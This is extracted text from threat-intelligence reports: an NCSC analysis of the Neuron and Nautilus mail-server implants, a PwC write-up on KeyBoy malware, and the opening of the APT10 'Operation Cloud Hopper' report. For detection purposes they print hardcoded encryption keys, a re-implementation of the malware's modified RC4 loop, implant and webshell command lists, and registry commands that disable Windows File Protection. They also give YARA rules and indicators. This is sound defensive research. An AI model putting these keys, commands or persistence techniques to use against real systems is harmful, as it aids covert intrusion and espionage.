the string " updater". This is then used as the description for the scheduled task.
TLP WHITE
Page 11 of 27
TLP WHITE
Configuration
The Neuron client configuration is stored in the registry as JSON; it must be set up by
the dropper before the client is run as no defaults are specified.
The configuration includes the domains where Neuron service implants have been
deployed, so that the client can communicate with them. The configuration also
specifies a beacon interval for each domain, along with a keep alive interval and time
wait interval.
An example of the server configuration in JSON representation, taken from a Neuron
client dropper, is as follows:
Connect
https:///ews/exchange/exchange.asmx
Interval
: 17
https:////ews/exchange/exchange.asmx
Interval
: 32
KeepAliveInterval
: 7,
CmdTimeWait
Network Communications
Communications are detailed in the Neuron service section. The Neuron client and
service primarily communicate via HTTP requests.
As an extra layer of security, the client RC4 encrypts any data being sent. The key
used is the Machine GUID retrieved from the registry
(SOFTWARE\Microsoft\Cryptography\MachineGuid); if this is not set then the default
key
8d963325-01b8-4671-8e82-d0904275ab06
is used.
TLP WHITE
Page 12 of 27
TLP WHITE
Capability
Once loaded the Neuron Client will loop indefinitely, performing a sync of storage files
with the Neuron service. The interval between synchronisations is specified in the
configuration by the
CmdTimeWait
value.
In order to synchronise with the service, the client will retrieve all local StorageFile
objects and all StorageFiles on the service (without file data) and compare these for
differences. The client retrieves the StorageFiles from the service by sending a POST
request with the following data within the parameter
cadata
: 0,
data
This is encrypted with RC4 and then base64 encoded before being sent.
The service will respond with a list of all StorageFile metadata (i.e. name and date of
each StorageFile). This is then used to determine which StorageFiles the client is
missing, as well as any files which the service is missing.
The client will send any required files (including file data) to the service by sending the
following command data:
: 1,
data
Where a storage file object has a JSON representation as follows:
name
: name,
data
: data,
date
: date
Finally, the client will download all missing StorageFiles from the service by sending
the following command data:
: 2,
data
:
TLP WHITE
Page 13 of 27
TLP WHITE
Where the sent data contains the required StorageFile names, as follows:
name
storage.file.1
name
storage.file.2
These new files are then written to disk, and added to the clients list of StorageFiles.
TLP WHITE
Page 14 of 27
TLP WHITE
Nautilus
Nautilus is very similar to Neuron both in the targeting of mail servers and how client
communications are performed. This malware is referred to as Nautilus due to its
embedded internal DLL name
nautilus-service.dll
, again sharing some resemblance
to Neuron.
The main payload and configuration of Nautilus is encrypted within a covert store on
disk which is located in
\ProgramData\Microsoft\Windows\Caches\
. The loader DLL
will access this covert store to decrypt the payload (oxygen.dll), which is then loaded
into a target process via reflective loading.
The Nautilus service listens for HTTP requests from clients to process tasking
requests such as executing commands, deleting files and writing files to disk.
Associated Files
Name
dcomnetsrv.dll
Description
Nautilus Loader DLL
2f742ec3bb7590602bc3e97326f2476a
SHA1
9d280e3ef1b180449086dda5b92a7b9bbe63dee4
SHA256
a415ab193f6cd832a0de4fcc48d5f53d6f0b06d5e13b3c359878c6c31f3e7ec3
Size
121344
Name
oxygen.dll
Description
Nautilus Injected payload
ea874ac436223b30743fc9979eed5f2f
SHA1
5ed61ec7de11922582f07c3488ef943b439ee226
SHA256
cefc5cf4d46abb86fb0f7c81549777cf1a2a5bfbe1ce9e7d08128ab8bfc978f8
Size
620568
Persistence
Nautilus achieves persistence by running as a service, dcomnetsrv, which is set to
automatically start. It is very likely that this is established by the Nautilus dropper,
similar to the Neuron service dropper; however, the NCSC has not yet analysed a
sample of this file.
Configuration
The configuration for Nautilus is stored encrypted within a covert store that was located
\ProgramData\Microsoft\Windows\Caches\
TLP WHITE
Page 15 of 27
TLP WHITE
The server configuration block, which defines the port and URL for Nautilus to listen
on, is passed in the identifier
config_listen.system
. A sample configuration is shown
below:
proto=https
host=+
port=443
param=OWA-AUTODISCOVER-EWS
Nautilus also stores several other pieces of contextual information within the covert
store under the identifier
ctx.system
, including an RSA public key:
-----BEGIN PUBLIC KEY----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAg4r6SSnj2PnYbe6C4H8c
M7162eRS+RTE8BYW8cTGdFPSiDiVOblImyddBLu/fW7MSc+BUsmg2l9SVyvJrHJk
0xnr7PRH9Dq7IcTYzQPMSsG1nC2Lej09EtilKwAQP08MIpiredzgXwom3rlH0Trc
HiKxjLhQcuK0Mllsq+54gYPaoi6LkZG/lUxhWuGI1M2i3/dHp40vbwaaL5Sotxuv
jSytDsU75U5T+rCAHVMykiLi/x7PKg40JQoYGMSOPUJsx87i/uy3uHoecl2ns038
b70Gh6KJ4x5mwaKjMRsSm8PUN6ccHSyqetpXuTXoKU5dEDIQLNAwXTZY40d/aTEx
uQIDAQAB
-----END PUBLIC KEY-----
The covert store uses a proprietary format to store data. This format stores separate
streams (i.e. one for the config and one for the context) with each split into chunks of
4096 bytes and encrypted using RC4. The offset to the next chunk is calculated by
taking the decrypted int value at offset 0xFF8 of the decrypted chunk, shifting this left
by 0xC and then adding 0x10000. For the first chunk, this initial int value is at offset
0xB4 of the header.
A default RC4 key is used to decrypt the first chunk; this key is hardcoded into Nautilus
1B1440D90FC9BCB46A9AC96438FEEA8B
but is passed into a function that
trims the length to 31 bytes, resulting in the final 32 byte initial RC4 key being
1B1440D90FC9BCB46A9AC96438FEEA8\x00
The RC4 implementation used for encryption of the covert store has been modified
from a standard implementation. This may be an attempt to frustrate decryption;
however, it is easily spotted when reverse engineering the sample.
TLP WHITE
Page 16 of 27
TLP WHITE
The following Python implementation duplicates the modified RC4 XOR loop:
def rc4(data, key):
x = 0
box = range(256)
for i in range(256):
x=(x + box[i] + ord(key[i%len(key)])) % 256
box[i], box[x] = box[x], box[i]
out = []
key = []
i = box[1]
j = box[i]
box[i] = i
box[1] = j
for char in data:
sbb = box[i % 256]
i += 1
sbb += j
kb = box[sbb % 256]
out.append(chr(ord(char) ^ kb))
return ''.join(out)
A covert store can be identified by RC4 decrypting the 4 bytes at offset 0xFFFC with the
default RC4 key followed by comparison with the magic bytes 0x3a29bd32.
Communications
Communication with clients is performed in a similar fashion to Neuron. Nautilus
listens for incoming connections from clients on port 443 that are addressed to the
URL
/OWA-AUTODISCOVER-EWS
; this URL path could be modified. Nautilus is
commonly installed on a victim mail server, enabling the pre-installed TLS
configuration to be used.
Data sent to the service is encoded in the referrer header, which is masquerading as
a legitimate Bing search. The format string used to create this is as follows:
Referer: http://www.bing.com/search?q=%s&go=Submit&qs=n&pq=%s&sc=0-11&sp=1&sk=&cvid=%s&first=21&FORM=%s
TLP WHITE
Page 17 of 27
TLP WHITE
Capability
The malware can take commands from connecting clients to perform on the infected
host. The commands take the format "O_001", "O_002" and so on. A subset of these
commands allow Nautilus to be tasked with the following:
O_001: Execute a cmd.exe command
O_002: Read file
O_003: Write file
O_007: Delete file
O_008: GetTempPathA
O_009: Sleep
O_010: Create directory
O_011: Check if directory
O_012 Duplicate of O_011
There also appear to be some separately processed commands containing the
following functionality:
O_100 Shutdown (implant)
O_101 Uninstall
TLP WHITE
Page 18 of 27
TLP WHITE
ErrorFE.aspx
Alongside the Neuron and Nautilus toolkits, the NCSC identified a file named
errorFE.aspx
. This file was installed on a number of victims following the successful
exploitation of web application software, and provides additional persistence to enable
the deployment of further tools.
The script defines its working directory as the value of the Windows environment
variable
temp
, using this location to drop and execute files and collect data.
This script accepts web requests and extracts the cookie parameter; valid data in the
cookie is base64 encoded and AES encrypted using hardcoded values.
The script supports the processing of multiple cookies from a single request, indicating
it is possible to issue multiple commands in a single request. When the cookie value
is decoded and decrypted, the script expects one of the following commands followed
by any additional parameters:
Command
update
time
Function
Accepts a file name and writes the contents
data
request parameter to a file in
the working directory
Overwrites the shell itself with the
content of the
data
request parameter
Updates the timestamp on a specific file
with a specified timestamp (creation, last
write and access).
Executes a provided command using
cmd.exe
Deletes a specified file
Gets a specified filename from the working
directory and returns its contents to the
requestor
TLP WHITE
Page 19 of 27
TLP WHITE
Appendix A
Neuron Client
File Name
Description
File Size
(bytes)
SHA1
SHA256
neuron-client.exe
Neuron Client
55808
File Name
Description
File Size
(bytes)
SHA1
SHA256
Sign.exe
Dropper for the Neuron Client
115712
File Name
Description
File Size
(bytes)
SHA1
SHA256
mydoc.doc
Macro document that drops and runs Sign.exe (client dropper)
591360
File Name
Description
File Size
(bytes)
SHA1
SHA256
Macro document that drops and runs Sign.exe (client dropper)
590336
4ed42233962a89deaa89fd7b989db081
cf731ee0af5c19231ff51af589f7434c0367d508
a96c57c35df18ac20d83b08a88e502071bd0033add0914b951adbd1639b0b873
3cd5fa46507657f723719b7809d2d1f9
34ddc14b9a04eba98c3aa1cb27033e12ec847e03
a6dbc36c472b3ba70a98efd0db35e75c340086be15d3c3ab4e39033604d0bcf9
66f4f1384105ce7ee1636d34f2afb1c9
3f23d152cc7badf728dfd60f6baa5c861a500630
42fbb2437faf68bae5c5877bed4d257e14788ff81f670926e1d4bbe731e7981b
0e430b6b203099f9c305681e1dcff375
845f3048fb0cfbdfb35bf6ced47da1d91ff2e2b1
bbe3700b5066d524dd961bd47e193ab2c34565577ce91e6d28bdaf609d2d97a8
TLP WHITE
Page 20 of 27
TLP WHITE
Neuron Service
File Name
Description
File Size (bytes)
SHA1
SHA256
Microsoft.Exchange.Service.exe
Neuron Service
43008
0f12268221e27406351a6313f902b498
b0dbdc81a0e367330007b7e593d8dabf92ca7afd
d1d7a96fcadc137e80ad866c838502713db9cdfe59939342b8e3beacf9c7fe29
File Name
Description
File Size (bytes)
SHA1
SHA256
w3wpdiag.exe
Neuron Service
59392
371b4380080e3d94ffcae1a7e9a0d5e2
f7088075d1c798f27b0d269c97dc877ff16f1401
2986bae15cfa78b919d21dc070be944e949a027e8047a812026e35c66ab17353
File Name
Description
File Size (bytes)
SHA1
SHA256
Updater.exe
Neuron Service
44544
8229622a9790d75e09a099e8758d5703
10586913ceeecd408da4e656c29ed4e91c6b758e
2f4d6a3c87770c7d42d1a1b71ed021a083b08f69ccaf63c15428c7bc6f69cb10
File Name
Description
File Size (bytes)
SHA1
SHA256
w3wpdiag.exe
Neuron Service
58880
a3bdc385cf68019449027bd6d8cecb4d
fe8da5a1e62a8d4f627834b0f26c802a330d8d45
0f4e9e391696ed8b9172985bb43cca7d7f2c8a4ae0493e4bf1f15b90f7138259
File Name
Description
File Size (bytes)
SHA1
SHA256
dropper-svc.exe
Dropper for the Neuron service
85008
d6ef3c8f2c3f3ddffbb70f5dadfa982c
934b288075c122165897276b360c61e77cb7bde0
fa543de359d498150cbcb67c1631e726a4b14b0a859573185cede5b12ad2abfb
TLP WHITE
Page 21 of 27
TLP WHITE
Neuron Yara
rule neuron_common_strings {
meta:
description = "Rule for detection of Neuron based on commonly used strings"
author = "NCSC UK"
hash = "d1d7a96fcadc137e80ad866c838502713db9cdfe59939342b8e3beacf9c7fe29"
strings:
$strServiceName = "MSExchangeService" ascii
$strReqParameter_1 = "cadataKey" wide
$strReqParameter_2 = "cid" wide
$strReqParameter_3 = "cadata" wide
$strReqParameter_4 = "cadataSig" wide
$strEmbeddedKey =
"PFJTQUtleVZhbHVlPjxNb2R1bHVzPnZ3WXRKcnNRZjVTcCtWVG9Rb2xuaEVkMHVwWDFrVElFTUNTNEFnRkRCclNm
clpKS0owN3BYYjh2b2FxdUtseXF2RzBJcHV0YXhDMVRYazRoeFNrdEpzbHljU3RFaHBUc1l4OVBEcURabVVZVklVb
HlwSFN1K3ljWUJWVFdubTZmN0JTNW1pYnM0UWhMZElRbnl1ajFMQyt6TUhwZ0xmdEc2b1d5b0hyd1ZNaz08L01vZH
VsdXM+PEV4cG9uZW50PkFRQUI8L0V4cG9uZW50PjwvUlNBS2V5VmFsdWU+" wide
$strDefaultKey = "8d963325-01b8-4671-8e82-d0904275ab06" wide
$strIdentifier = "MSXEWS" wide
$strListenEndpoint = "443/ews/exchange/" wide
$strB64RegKeySubstring = "U09GVFdBUkVcTWljcm9zb2Z0XENyeXB0b2dyYXBo" wide
$strName = "neuron_service" ascii
$dotnetMagic = "BSJB" ascii
condition:
(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and $dotnetMagic and 6 of
($str*)
TLP WHITE
Page 22 of 27
TLP WHITE
rule neuron_standalone_signature {
meta:
description = "Rule for detection of Neuron based on a standalone signature from .NET
metadata"
author = "NCSC UK"
hash = "d1d7a96fcadc137e80ad866c838502713db9cdfe59939342b8e3beacf9c7fe29"
strings:
$a =
{eb073d151231011234080e12818d1d051281311d1281211d1281211d128121081d1281211d1281211d128121
1d1281211d1281211d1281211d1281211d1281211d1281211d1281211d1281211d1281211d1281211d1281211
d1281211d1281211d1281211d1281211d1281211d1281211d1281211d1281211d1281211d1281}
$dotnetMagic = "BSJB" ascii
condition:
(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them
TLP WHITE
Page 23 of 27
TLP WHITE
rule neuron_functions_classes_and_vars {
meta:
description = "Rule for detection of Neuron based on .NET function, variable and
class names"
author = "NCSC UK"
hash = "d1d7a96fcadc137e80ad866c838502713db9cdfe59939342b8e3beacf9c7fe29"
strings:
$class1 = "StorageUtils" ascii
$class2 = "WebServer" ascii
$class3 = "StorageFile" ascii
$class4 = "StorageScript" ascii
$class5 = "ServerConfig" ascii
$class6 = "CommandScript" ascii
$class7 = "MSExchangeService" ascii
$class8 = "W3WPDIAG" ascii
$func1 = "AddConfigAsString" ascii
$func2 = "DelConfigAsString" ascii
$func3 = "GetConfigAsString" ascii
$func4 = "EncryptScript" ascii
$func5 = "ExecCMD" ascii
$func6 = "KillOldThread" ascii
$func7 = "FindSPath" ascii
$var1 = "CommandTimeWait" ascii
$dotnetMagic = "BSJB" ascii
condition:
(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and $dotnetMagic and 6 of
them
TLP WHITE
Page 24 of 27
TLP WHITE
Nautilus
File Name
Description
File Size (bytes)
SHA1
SHA256
dcomnetsrv.dll
Nautilus Loader DLL
121344
2f742ec3bb7590602bc3e97326f2476a
9d280e3ef1b180449086dda5b92a7b9bbe63dee4
a415ab193f6cd832a0de4fcc48d5f53d6f0b06d5e13b3c359878c6c31f3e7ec3
File Name
Description
File Size (bytes)
SHA1
SHA256
oxygen.dll
Nautilus Injected payload
620568
ea874ac436223b30743fc9979eed5f2f
5ed61ec7de11922582f07c3488ef943b439ee226
cefc5cf4d46abb86fb0f7c81549777cf1a2a5bfbe1ce9e7d08128ab8bfc978f8
Nautilus Yara
rule nautilus_modified_rc4_loop {
meta:
description = "Rule for detection of Nautilus based on assembly code for a modified
RC4 loop"
author = "NCSC UK"
hash = "a415ab193f6cd832a0de4fcc48d5f53d6f0b06d5e13b3c359878c6c31f3e7ec3"
strings:
$a = {42 0F B6 14 04 41 FF C0 03 D7 0F B6 CA 8A 14 0C 43 32 14 13 41 88 12 49 FF C2
49 FF C9}
condition:
(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and $a
TLP WHITE
Page 25 of 27
TLP WHITE
rule nautilus_rc4_key {
meta:
description = "Rule for detection of Nautilus based on a hardcoded RC4 key"
author = "NCSC UK"
hash = "a415ab193f6cd832a0de4fcc48d5f53d6f0b06d5e13b3c359878c6c31f3e7ec3"
strings:
$key = {31 42 31 34 34 30 44 39 30 46 43 39 42 43 42 34 36 41 39 41 43 39 36 34 33 38
46 45 45 41 38 42}
condition:
(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and $key
rule nautilus_common_strings {
meta:
description = "Rule for detection of Nautilus based on common plaintext strings"
author = "NCSC UK"
hash = "a415ab193f6cd832a0de4fcc48d5f53d6f0b06d5e13b3c359878c6c31f3e7ec3"
strings:
$ = "nautilus-service.dll" ascii
$ = "oxygen.dll" ascii
$ = "config_listen.system" ascii
$ = "ctx.system" ascii
$ = "3FDA3998-BEF5-426D-82D8-1A71F29ADDC3" ascii
$ = "C:\\ProgramData\\Microsoft\\Windows\\Caches\\{%s}.2.ver0x0000000000000001.db"
ascii
condition:
(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and 3 of them
TLP WHITE
Page 26 of 27
TLP WHITE
Additional Indicators for Forensic Analysis
The following indicators can be used to search for the presence of Neuron and
Nautilus malware within forensic analysis tools.
$zf(-1,
$zf(-2,
{"instructions":[{"type":
App_Web_juvjerf3.dll
App_Web_vcplrg8q.dll
ar_all2.txt
ar_sa.txt
Convert.FromBase64String(temp[1])
D68gq#5p0(3Ndsk!
dx11.exe
ERRORF~1.ASP
errorFE.aspx
errorfe.aspx.f5dba9b9.compiled
intelliAdminRpc
J8fs4F4rnP7nFl#f
lsa.exe
Msnb.exe
msrpc.exe
Neuron_service
owa.exe
owa_ar2.bat
rexec.exe
payload.x64.dll.system
service.x64.dll.system
TLP WHITE
Page 27 of 27
The KeyBoys are back in town
www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-backin-town.html
Analysis
Our analysis starts with a Microsoft Word document named 2017 Q4 Work Plan.docx
(with a hash of 292843976600e8ad2130224d70356bfc), which was created on 2017-1011 by a user called
Admin
, and first uploaded to VirusTotal, a website and file scanning
service, on the same day, by a user in South Africa.
Curiously, the Word document does not contain any macros, or even an exploit. Rather,
it uses a technique recently reported on by SensePost, which allows an attacker to craft
a specifically created Microsoft Word document, which uses the Dynamic Data Exchange
(DDE) protocol. DDE traditionally allows for the sending of messages between
applications that share data, for example from Word to Excel or vice versa. In the case
reported on by SensePost, this allowed for the fetching or downloading of remote
payloads, using PowerShell for example.
Figure 1
Word Error
Once we extract the initial document, using 7-zip for example, we can observe the usual
structure, and inside, a file called document.xml is of interest. In this XML, a remote
payload, in this case a DLL, will be downloaded using PowerShell, moved to the user
temporary folder, and run using rundll32.exe, starting in the HOK function or export.
Figure 2 shows the relevant part in our XML file.
Figure 2 - Download and payload execution
This debug.dll is a PE32 binary file with the following properties:
md5 hash: 64b2ac701a0d67da134e13b2efc46900
sha1 hash: 1bb516d70591a5a0eb55ee71f9f38597f3640b14
sha256 hash:
f3f55c3df39b85d934121355bed439b53501f996e9b39d4abed14c7fe8081d92
size: 531,456 bytes
internal DLL name: InstallClient.dll
compiler: Microsoft
linker: Microsoft Linker(14.0)[DLL32]
compilation time: 2017-07-06 08:50:10
This DLL serves as a dropper for the actual payload, and as such the internal name of
InstallClient
is an apt choice by the threat actor. Developing a Yara rule for the simple
dropper DLL, yielded several new binaries:
1dbbdd99cb8d7089ab31efb5dcf09706
5708e0320879de6f9ac928046b1e4f4e
a6903d93f9d6f328bcfe3e196fd8c78b
cf6f333f99ee6342d6735ac2f6a37c1e
ac9b8c82651eafff9a3bbe7c69d69447
d6ddecdb823de235dd650c0f7a2f3d8f
We have analysed d6ddecdb823de235dd650c0f7a2f3d8f, which also has InstallClient.dll
as its internal name, as it seems to be the earliest dropper DLL used in this campaign,
and does not appear to be very different from any of the other DLLs so far uncovered.
The DLL starts in the function named Insys, which performs some simple checks, for
example, if the current user account is an administrator, and will subsequently call the
function named SSSS, which is the main function.
A substantial amount of actions will follow according to what
s defined in the SSSS
function, as follows:
Prepare target DLL, in this case rasauto.dll, for replacement in
C:\Windows\System32;
Stop the service belonging to the target DLL, and use the takeown and icacls
commands to gain full permissions for the system service DLL;
Disable Windows File Protection, which normally prevents software or users from
replacing critical Windows files;
Suppress any error messages from Windows from popping up on boot;
Copy the target DLL, rasauto.dll, to a new file named rasauto32.dll;
Replace the target DLL with the malware
s DLL, which is time-stomped in order to
evade detection;
Start the now malicious service using net.exe and net1.exe; and,
Create configuration and keylogs in C:\Windows\system32, using an uncommon
extension, in this case .tsp, and additionally create a folder in C:\Programdata for
the purpose of screen captures.
The malware will also, in some observed cases, output debug or error messages in a
newly created file in the user
s Application Data folder as DebugLog.TXT, for example:
\AppData\Roaming\Microsoft\Windows\Cookies\DebugLog.TXT
Then, the original dropper DLL will then be deleted, using a simple batch file that runs in
a loop. In Figures 3 to 5, the target DLL, the original and new DLL, as well as the full
process flow are shown.
Figure 3 - Target DLL, config and keylog file built dynamically on the stack
Figure 4 - Real and fake rasauto.dll (rasauto32.dll is the real or original DLL)
Figure 5 - Complete process flow
While visually there is apparently no difference, due to the malware being time-stomped
(altering the created and modified dates of a file or folder), we can however observe a
few subtle differences in the real and malicious binary.
Figure 6 - Subtle differences
As can be seen in Figure 6, the fake DLL has a different link date, some minor spelling
mistakes, and does not include the build in the file version details. As the malware also
disables Windows File Protection and thus any pop-ups, it may not be immediately
obvious to system administrators that a legitimate DLL was actually replaced. The
following commands are issued in order to achieve persistence:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v
SFCDisable /t REG_DWORD /d 4 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Windows" /v
NoPopUpsOnBoot /t REG_DWORD /d 1 /f
Taking a look at the Windows registry for our service, RasAuto, short for Remote Access
Auto Connection Manager and historically used for connecting dial-up modems to the
internet for example, reveals no specific additional modifications.
Dllhost.exe is additionally seen to call back or phone home to a hardcoded range of C2
servers, on ports 53, 80, and 443.
Figure 7 - Dllhost connecting to a remote address
Dllhost usually has no need to connect to the internet or WAN, and as such it is a
possible indicator of malicious activity.
Attaching a debugger to dllhost.exe, reveals the keylogger files and configuration,
replaced DLL file, as well as another folder, which is likely used to store screenshots and
other data. Another ASCII string can be discovered in the DLL
s config,
MDDEFGEGETGIZ, which likely pertains to the specific KeyBoy campaign, or target.
Figure 8 - ASCII dump
The malware leveraged by KeyBoy has a plethora of functionality, including, but not
limited to:
Screen grabbing/taking screenshots;
Determine public or WAN IP address (using a public IP service), likely for
determining a suited target;
Gather extended system information, such as information about the operating
system, disks, memory and so on;
file browser
or explorer;
Shutdown and reboot commands (in addition to the point below);
Launching interactive shells for communicating with the victim machine;
Download and upload functionality; and
Usage of custom SSL libraries for masquerading C2 traffic.
Interestingly enough, the malware developers left several unique debug messages, for
example:
GetScreenCmd from file:%s
Take Screen Error,May no user login!
Take Screen Error,service dll not exists
Earlier, we mentioned the threat actor uses custom SSL libraries to communicate to the
C2. While we have been unable to observe this behavior in any traffic logs, we were able
to extract a certificate, which can be found in Appendix B. Converting this certificate to
the DER format, we find strings pointing to jessma.org, and an email address,
ldcsaa@21cn.com. These belong to projects by a Chinese developer, where one of the
tools or libraries is named HP-Socket, which is a
High Performance TCP/UDP Socket
Component
Additionally, said library sported an interesting debug path:
D:\Work\VS\Horse\TSSL\TSSL_v0.3.1_20170722\TClient\Release\TClient.pdb
In addition to writing a Yara rule for the dropper DLL and finding additional samples as
mentioned above, we repeated the same process for the payload DLL. In Table 1 below,
you may find other payloads, with their related and fake, or replaced Windows DLL or
service.
Hash
Impersonated DLL
Impersonated service
a55b0c98ac3965067d0270a95e60e87e
ikeext.dll
2e04cdf98aead9dd9a5210d7e601cca7
rasauto.dll
d6ddecdb823de235dd650c0f7a2f3d8f
rasauto.dll
1dbbdd99cb8d7089ab31efb5dcf09706
581ddf0208038a90f8bc2cdc75833425
sinet.dll
sinet.dll
IKE and AuthIP IPsec
Keying Modules
Remote Access Auto
Connection Manager
Remote Access Auto
Connection Manager
Unknown
Unknown
Table 1 - Impersonated DLLs
Sinet.dll may relate to SPlayer, a popular video player in China.
Related samples
Hunting further, we have discovered similar samples to the ones described above, with
additional interesting debug paths:
Hash
7d39cef34bdc751e9cf9d46d2f0bef95
29e44cfa7bcde079e9c7afb23ca8ef86
Debug path
D:\work\vs\UsbFerry_v2\bin\UsbFerry.pdb
E:\Work\VS Project\cyassl-3.3.0\out\SSLClient_x64.pdb
Table 2 - Other debug paths
Both samples include references to a
work
folder, and a
or
VS Project
. The latter
likely points to a Visual Studio project short name, or VS. While the connection initially
seems rather weak, it did hit the same Yara rule as mentioned before and the sample
with hash 29e44cfa7bcde079e9c7afb23ca8ef86 additionally includes an SSL certificate,
which, when converted, points to another custom SSL library, called WolfSSL, which is a
a small, fast, portable implementation of TLS/SSL for embedded devices to the cloud
The same hash or binary also includes what we assess to be a campaign name or
KeyBoy version identifier, which is weblogic20170727.
Another sample which hit our Yara rule is 7aea7486e3a7a839f49ebc61f1680ba3, which
was first uploaded to VirusTotal on 2017-08-25. This sample appears to be an older
variant of KeyBoy, as there are several plain-text strings present, which are consistent
with CitizenLab
s report referenced in the introduction.
All samples (hashes) and other indicators are provided in Appendix A.
Infrastructure
We have mapped out the complete infrastructure that we have discovered, using
Maltego, as shown in Figure 9.
Figure 9 - C2 graphing
There was some overlap with the samples and infrastructure, and one email address
appears to jump out, which is linked to several domains: 657603405@qq[.]com. This
email address does not appear to have been observed before.
One other relevant point to note in regards to the infrastructure, is the use of dates,
likely relating to campaign names, as part of the C2 servers. Examples include:
Weblogic727.xxuz[.]com (2017-07-27 campaign); and,
Weblogic1709.zzux[.]com (2017-09-17 campaign).
All C2
s are provided in Appendix A.
www.pwc.co.uk/cyber
Operation
Cloud Hopper
Exposing a systematic
hacking operation with an
unprecedented web of
global victims
April 2017
In collaboration with
Contents
Foreword
Executive summary
APT10 as a China-based threat actor
Motivations behind APT10
s targeting
Shining a light on APT10
s methodology
Conclusion
Appendices
Operation Cloud Hopper
Foreword
This report is an initial public release of research PwC UK and
BAE Systems have conducted into new, sustained global
campaigns by an established threat actor against managed IT
service providers and their clients as well as several directly
targeted organisations in Japan. Given the scale of those
campaigns, the activity identified here is likely to reflect just a
small portion of the threat actor
s operations.
This report is primarily fact-based. Where we have made an
assessment this has been made clear by phraseology such as
assess
, and the use of estimative language as outlined in
Appendix A.
By publicly releasing this research, PwC UK and BAE Systems
hope to facilitate broad awareness of the attack techniques used
so that prevention and detection capabilities can be configured
accordingly. It is also hoped that rapid progress can be made
within the broader security community to further develop the
understanding of the campaign techniques we outline, leading to
additional public reports from peers across the security
community.
As a part of our research and reporting effort, PwC UK and BAE
Systems have collaborated with the UK
s National Cyber Security
Centre (NCSC) under its Certified Incident Response (CIR)
scheme to engage and notify managed IT service providers,
known affected organisations and other national bodies.
Supplementary to this report, an Annex containing our technical
analysis will be released.
Operation Cloud Hopper
Executive summary
Since late 2016, PwC UK and BAE Systems have been assisting victims of a new cyber espionage campaign conducted by a
China-based threat actor. We assess this threat actor to almost certainly be the same as the threat actor widely known within
the security community as
APT10
. The campaign, which we refer to as Operation Cloud Hopper, has targeted managed IT
service providers (MSPs), allowing APT10 unprecedented potential access to the intellectual property and sensitive data of
those MSPs and their clients globally. A number of Japanese organisations have also been directly targeted in a separate,
simultaneous campaign by the same actor.
We have identified a number of key findings that are detailed below.
APT10 has recently unleashed a sustained campaign
against MSPs. The compromise of MSP networks has
provided broad and unprecedented access to MSP customer
networks.
Multiple MSPs were almost certainly being targeted from
2016 onwards, and it is likely that APT10 had already
begun to do so from as early as 2014.
MSP infrastructure has been used as part of a complex web
of exfiltration routes spanning multiple victim networks.
APT10 has significantly increased its scale and capability
since early 2016, including the addition of new custom
tools.
APT10 ceased its use of the Poison Ivy malware family
after a 2013 FireEye report, which comprehensively
detailed the malware
s functionality and features, and its
use by several China-based threat actors, including APT10.
APT10 primarily used PlugX malware from 2014 to 2016,
progressively improving and deploying newer versions,
while simultaneously standardising their command and
control function.
We have observed a shift towards the use of bespoke
malware as well as open-source tools, which have been
customised to improve their functionality. This is highly
likely to be indicative of an increase in sophistication.
Infrastructure observed in APT10
s most recent campaigns
links to previous activities undertaken by the threat actor.
The command and control infrastructure used for
Operation Cloud Hopper is predominantly dynamic-DNS
domains, which are highly interconnected and link to the
threat actor
s previous operations. The number of
dynamic-DNS domains in use by the threat actor has
significantly increased since 2016, representative of an
increase in operational tempo.
Some top level domains used in the direct targeting of
Japanese entities share common IP address space with the
network of dynamic-DNS domains that we associate with
Operation Cloud Hopper.
APT10 focuses on espionage activity, targeting intellectual
property and other sensitive data.
APT10 is known to have exfiltrated a high volume of data
from multiple victims, exploiting compromised MSP
networks, and those of their customers, to stealthily move
this data around the world.
The targeted nature of the exfiltration we have observed,
along with the volume of the data, is reminiscent of the
previous era of APT campaigns pre-2013.
PwC UK and BAE Systems assess APT10 as highly likely to
be a China-based threat actor.
It is a widely held view within the cyber security
community that APT10 is a China-based threat actor.
Our analysis of the compile times of malware binaries, the
registration times of domains attributed to APT10, and the
majority of its intrusion activity indicates a pattern of work
in line with China Standard Time (UTC+8).
The threat actor
s targeting of diplomatic and political
organisations in response to geopolitical tensions, as well
as the targeting of specific commercial enterprises, is
closely aligned with strategic Chinese interests.
Operation Cloud Hopper
APT10 as a China-based threat actor
APT10 as a China-based threat actor
PwC UK and BAE Systems assess it is highly likely that APT10
is a China-based threat actor with a focus on espionage and
wide ranging information collection. It has been in operation
since at least 2009, and has evolved its targeting from an early
focus on the US defence industrial base (DIB)1 and the
technology and telecommunications sector, to a widespread
compromise of multiple industries and sectors across the
globe, most recently with a focus on MSPs.
APT10, a name originally coined by FireEye, is also referred to
as Red Apollo by PwC UK, CVNX by BAE Systems, Stone
Panda by CrowdStrike, and menuPass Team more broadly in
the public domain. The threat actor has previously been the
subject of a range of open source reporting, including most
notably a report by FireEye comprehensively detailing the
threat actor
s use of the Poison Ivy malware family2 and blog
posts by Trend Micro3 similarly detailing the use of EvilGrab
malware.
Alongside the research and ongoing tracking of APT10 by
both PwC UK and BAE
s Threat Intelligence teams, PwC UK
Incident Response team has been engaged in supporting
investigations linked to APT10 compromises. This research
has contributed to the assessments and conclusions we have
drawn regarding the recent campaign activity by APT10,
which represents a shift from previous activities linked to the
threat actor.
As a result of our analysis of APT10
s activities, we believe that
it almost certainly benefits from significant staffing and
logistical resources, which have increased over the last three
years, with a significant step-change in 2016. Due to the scale
of the threat actor
s operations throughout 2016 and 2017, we
similarly assess it currently comprises multiple teams, each
responsible for a different section of the day-to-day
operations, namely domain registration, infrastructure
management, malware development, target operations, and
analysis.
APT10 withdrew from direct targeting using Poison Ivy in
2013 and conducted its first known retooling operation,
upgrading its capabilities and replatforming to use PlugX. It is
highly likely that this is due to the release of the 2013 FireEye
report.
Our report will detail the most recent campaigns conducted
by APT10, including the sustained targeting of MSPs, which
we have named Operation Cloud Hopper, and the targeting of
a number of Japanese institutions.
